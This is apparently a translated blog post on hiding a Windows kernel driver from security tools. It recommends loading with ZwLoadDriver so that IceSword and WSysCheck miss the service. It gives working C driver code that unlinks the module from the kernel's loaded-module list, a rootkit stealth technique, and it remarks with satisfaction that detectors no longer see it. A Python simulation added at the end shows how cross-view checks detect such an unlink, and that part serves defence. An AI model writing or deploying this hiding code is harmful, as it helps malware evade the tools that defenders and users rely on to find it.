Driver loading, hiding the module and the service

2019-11-30 Source:

1. Hiding the service

A driver is generally loaded in one of three ways: OpenSCManager, ZwLoadDriver, or ZwSetSystemInformation. Here we use ZwLoadDriver to load the driver, and that alone hides the service (I did not try the others): IceSword (冰刃) and WSysCheck no longer see our service.

2. Hiding the module

The module is hidden by unlinking it from the loaded-module list. Note that the driver must be loaded with ZwLoadDriver, not OpenSCManager, otherwise the result is what the figure below shows.

The driver code is fairly simple:

```c
#include "ntddk.h"

typedef unsigned long DWORD;
typedef DWORD* PDWORD;

/* Partial layout of the loader data-table entry that DRIVER_OBJECT->DriverSection
   points to; only the list links at the start are used here. */
typedef struct _DRIVER_DATA
{
    LIST_ENTRY listEntry;
    DWORD unknown1;
    DWORD unknown2;
    DWORD unknown3;
    DWORD unknown4;
    DWORD unknown5;
    DWORD unknown6;
    DWORD unknown7;
    UNICODE_STRING path;
    UNICODE_STRING name;
} DRIVER_DATA;

VOID OnUnload( IN PDRIVER_OBJECT pDriverObject )
{
    DbgPrint("OnUnload called.");
}

NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )
{
    DRIVER_DATA* driverData;

    /* DriverSection sits at offset 20 in the 32-bit DRIVER_OBJECT */
    driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));
    if( driverData != NULL )
    {
        /* Unlink this entry from the loaded-module list: the previous entry's
           Flink now skips over us, and the next entry's Blink points back past us. */
        *((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;
        driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;
        DbgPrint("Successful.\n");
    }
    pDriverObject->DriverUnload = OnUnload;
    return STATUS_SUCCESS;
}
```

After loading the driver, seeing "Successful" printed in DbgView tells us it is running. Then look at the module and service views in IceSword: nothing shows up, heh heh. The figure below shows the effect when the driver is loaded with OpenSCManager instead, so do not load with OpenSCManager; load with ZwLoadDriver, and IceSword will not detect it.
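As an added example (not from the original post), a user-mode Python simulation of why this unlink is detectable: the two pointer writes remove the entry from a list walk, but the entry object itself still sits in memory with its own Flink/Blink pointing into the list, so a cross-view check (memory scan versus list walk, plus the rule that Flink->Blink must point back to the entry) flags it. Addresses and module names are constructed.

```python
"""Cross-view detection of an entry unlinked from a circular doubly linked list,
modelling the PsLoadedModuleList unlink performed by the driver above."""
from dataclasses import dataclass


@dataclass
class Entry:
    addr: int
    name: str
    flink: int   # address of next entry
    blink: int   # address of previous entry


def build_list(names, base=0x1000, stride=0x100):
    """Constructed sample: list head at `base`, one entry per name after it."""
    addrs = [base + i * stride for i in range(len(names) + 1)]
    mem = {}
    for i, a in enumerate(addrs):
        name = "HEAD" if i == 0 else names[i - 1]
        mem[a] = Entry(a, name, addrs[(i + 1) % len(addrs)], addrs[i - 1])
    return mem, addrs[0]


def unlink(mem, addr):
    """The same two writes the driver does: neighbours skip the entry,
    while the entry's own Flink/Blink are left untouched."""
    e = mem[addr]
    mem[e.blink].flink = e.flink
    mem[e.flink].blink = e.blink


def walk(mem, head):
    """What a list-walking tool (e.g. a module viewer) sees."""
    seen, cur = [], mem[head].flink
    while cur != head:
        seen.append(mem[cur].name)
        cur = mem[cur].flink
    return seen


def find_hidden(mem, head):
    """Scan every entry object in memory (the second view) and report those
    missing from the walk or failing the Flink->Blink == self consistency rule."""
    walked = set(walk(mem, head))
    hidden = []
    for a, e in mem.items():
        if a == head:
            continue
        orphan = mem[e.flink].blink != a or mem[e.blink].flink != a
        if e.name not in walked or orphan:
            hidden.append(e.name)
    return hidden
```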

